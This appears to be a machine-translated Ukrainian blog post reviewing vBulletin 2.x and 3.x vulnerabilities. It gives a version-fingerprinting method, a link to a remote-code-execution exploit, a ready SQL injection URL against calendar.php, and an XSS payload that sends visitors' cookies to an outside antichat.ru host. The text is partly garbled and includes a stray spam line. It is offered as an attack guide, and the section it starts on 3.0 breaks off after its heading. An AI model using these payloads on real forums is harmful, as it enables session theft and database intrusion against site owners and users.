Feb
27
« Використання форуму на движку vBulletin | Продуктивність і оптимізація скрипта vBulletin FAQ »
На форумі є огляди уязвімостей ipb і phpbb, я вирішив зробити огляд уязвімостей vBulletin -). Отже почну.
Розглянемо уразливості трьох віток вобли: 2.*.* , 3.0.* і 3.1.* .
Дізнаємося версію форуму.
В теці /clientscript/ знаходяться неськолко js і css файлів в яких можна подивитися точну версію форуму.
Код:
vbulletin_ajax_threadslist.js
vbulletin_ajax_namesugg.js
vbulletin_attachment.js
vbulletin_cpcolorpicker.js
vbulletin_editor.jsПример:
Код:
www.xz.сom/forumpath/clientscript/vbulletin_editor.css
vBulletin 2
2.2.* - 2.2.4 - Виконання довільного коду
корпоративная алушта в киеве
Опис уразливості: уразливість в vBulletin’s Calendar PHP сценарії (calender.php) дозволяє тому, що видаленому атакує виконувати довільний код в контексті користувача ‘nobody’.
Exploit: http://www.securitylab.ru/vulnerability/source/207147.php
2.3.* - SQL injection
Опісанте уразливості: уразливість в перевірці правильності вхідних даних в ‘calendar.php’. Видалений користувач може упровадити довільні SQL команди.
Приклад:
Код:
www.xz.сom/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies,public,userid,’0000-0-0′,version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate
2.*.* - XSS
Опис уразливості: уразливість існує із-за недостатньої обробки тега email.
Exploit:
Код:
[E*MAIL]aaa@aaa.aa”’s=’[/E*MAIL]‘ sss=”i=new Image(); i.src=’http://antichat.ru/cgi-bin/s.jpg?’+document.cookie;this.sss=null” style=top:expression(eval(this.sss));
Video: http://video.antichat.ru/file57.html
vBulletin 3.0
3.0.0 - XSS
Tags: дані, код, користувач, опис, приклад, сценарій, уразливість
VBulletin
Схожі записи
- Вимоги для установки Intellect Board (03.04.2009)
... 53 або вище База даних з правами на створення таблиць і індексів і виконання з ними основних дій: вибірки, створення, видалення записів. не Меншого 2 Mb дискового простору для скриптів і картинок і 5 Mb - для бази даних ... - NovaBoard новонароджений конкурент IPB і PHPBB (07.04.2009)... Можна запропонувати реалізувати як опцію. Просте створення тим оформлення і модулів. Це підкреслюється особливо. Проста установка модулів прямо з адмінки (пряма модифікація файлів форуму теж допустима, втім). Очікується унікальна система боротьби із спамом, на додаток до традиційних. Про функції з перших рук можна почитати ...
- Типи розділів Intellect Board (02.04.2009)
... Є можливість автоматичної перевірки працездатності посилань. Презентація - розділ, що містить статичний текст, що задається модератором розділу. Спочатку презентація призначалася для розміщення опису програм, тому вона також може містити посилання на які-небудь матеріали і підрозділи. Енциклопедія - словарні статті в алфавітному порядку, згруповані по буквах. Є ... - IPB 3 Каркас додатку на PHP 5 (04.03.2009)
... Щоб побачити вигоду від використання PHP 5, потрібно розглянути нову структуру Invision Power Board, яка стала результатом переходу до 5-ке. Хоча Invision Power Board 1 і 2 були засновані на патерні 'Front controller', вони не мали реального каркаса, на який би навішувався код. Близьким до такого каркаса був 'ipsclass', який ... - Мій останній реліз Intellect Board 2x (01.04.2009)
... . Я дізнався багато що з того, про що на початковому етапі мав вельми віддалені уявлення, наприклад, mod_rewrite або формат RSS, істотно розширив свої знання і в питаннях безпеки. Багато в чому помінялося моє відношення до цілого ряду питань. Якщо на початку шляху я категорично заперечував використання ООП в Web-програмуванні, вважав безглуздим приділення уваги питанням юзабіліті, ...